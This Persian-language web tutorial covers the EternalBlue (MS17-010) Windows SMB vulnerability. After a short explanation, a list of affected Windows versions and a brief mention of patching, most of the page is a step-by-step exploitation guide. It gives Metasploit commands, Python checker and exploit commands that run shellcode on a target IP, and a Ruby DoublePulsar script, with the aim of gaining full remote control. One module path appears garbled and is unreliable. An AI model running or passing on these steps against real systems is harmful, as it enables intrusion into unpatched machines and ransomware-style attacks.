اموزش اکسپلویت Eternalblue

اکسپلویت Eternalblue اموزش قدم به قدم و معرفی چندین ابزار حرفه ای برای استفاده از این اسیب پذیری
ابزار چک و تست اسیب پذیر بودن MS17-010 Eternalblue اموزش تصویری
اموزش کلی از اسیب پذیری اکسپلویت Eternalblue و توضیحات معرفی ان برای تمامی سیستم عامل ها

اموزش ابزار اکسپلویت Eternalblue 

MS17-010

اموزش اکسپلویت Eternalblue چیست ؟

اکسپلویت نسبتا جدیدی که توسط هکر هایی  از سیستم های سازمان NSA دزدیده شد
این اکسپلویت با استفاده از اسیب پذیری سرویس SMB  ویندوز عمل میکند و باعث اجرای کد از راه دور میشود
سرویس های SMB به طور کلی در سیستم عامل فعال هستند و به همین دلیل بسیاری از سیستم های جهانی مورد خطر این اسیب پذیری قرار گرفته اند 
و باید حتما از اپدیت های امنیتی یا فایل پچ این اسیب پذیری استفاده نمایند
 

چگونه میتوان از اکسپلویت Eternalblue استفاده کرد ؟

امروز که این اسیب پذیری بسیار دیده میشود ابزار هایی برای استفاده راحت از این اکسپلویت ساخته شده است
و در ادامه این اموزش چندین ابزار ساده و کاربردی برای این اسیب پذیری را معرفی خواهیم کرد همچنین همراه اموزش استفاده از ان
 

چه سیستم عامل هایی را شامل میشود ؟

  • Windows XP 
  • Windows 2000
  • Windows 2003 R2 
  • Windows 2008 R2
  • Windows 2012 R2 
  • Windows 7 SP1 
  • Windows 8.1
  • Windows 2016
  • Windows 10  

 

سطح دسترسی

با این اکسپلویت میتوانید از راه دور شل کد خود را اجرا کنید و به صورت کامل دسترسی خود را به سیستم مورد نظر بگیرید
راه رفع این اسیب پذیری بهرانی استفاده از اپدیت های امنیتی سیستم عامل میباشد همچنین میتونید فایل رف این اسیب پذیری را به صورت جدا گانه دانلود و نصب نمایید
 

نکته

از جمله میتوان برای این اسیب پذیری مشکلات بزرگی را مثال زد مانند استفاده بات نت ها و باج افزار ها برای نفوذ و باج گیری همانند باج افزار wannacry که باعث خسارت های بسیاری شد 
 

نصب 

یکی از راه های استفاده از اکسپلویت Eternalblue استفاده از ان در متااسپلویت میباشد که در نسخه جدید ان افزوده شده است
در صورت موجود نودن در متااسپلوت متااسپلوست خود را اپدیت نمایید با استفاده از دستور زیر 

msfupdate

اجرای اکسپلویت در متااکسپلویت
اجرای متا

msfconsole

انتخاب اکسپلویت

use address/smb/smb_ms17_010

نمایش اطلاعات ست شده

options 

ست کردن ایپی سیستم

set rhosts ip_server

ست کردن پورت اکسپلویت که به صورت پیشفرض هم موجود است

set rport 445

اجرا یا run

exploit

اکسپلویت Eternalblue در متااسلویت
(همچنین میتوانید به صورت دستی فایل را به متااسپلویت خود اضافه کنید لینک در اخر صفحه میباشد.)

 

اجرای اکسپلویت با ابزار 

ابزاری عالی برای استفاده از MS17-010 نوشته شده به زبان پاتون و برای سیستم عامل های مختلف
دانلود ابزار با استفاده از دستور زیر

git clone link 

تست Eternalblue
چک کردن اسیب پذیر بودن سیستم مورد نظر با استفاده از ایپی سیستم

 python checker.py ip_server

اکسپلویت Eternalblue
اجرای شل کد بر روی سیستم با استفاده از اکسپلویت

python exploit.py ip_server shellcode

 
 
معرفی ابزاری دیگر نشوته شده با زبان ruby لینک در اخر مطلب
اجرا با دستور زیر

ruby eternalblue_doublepulsar.rb

 
نکته : در استفاده از این اکسپلویت ها پایتون و یا روبی به روی سیستم خود نصب کنید به طور پیشفرض بر روی کالی لینوکس که در تصاویر میبینید نصب میباشد.

 

فایل های ابزار اکسپلویت Eternalblue :


[ozv]
Eternalblue Metasploit
MS17-010 Python
MS17-010 Ruby
[/ozv]


 

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مطالب مرتبط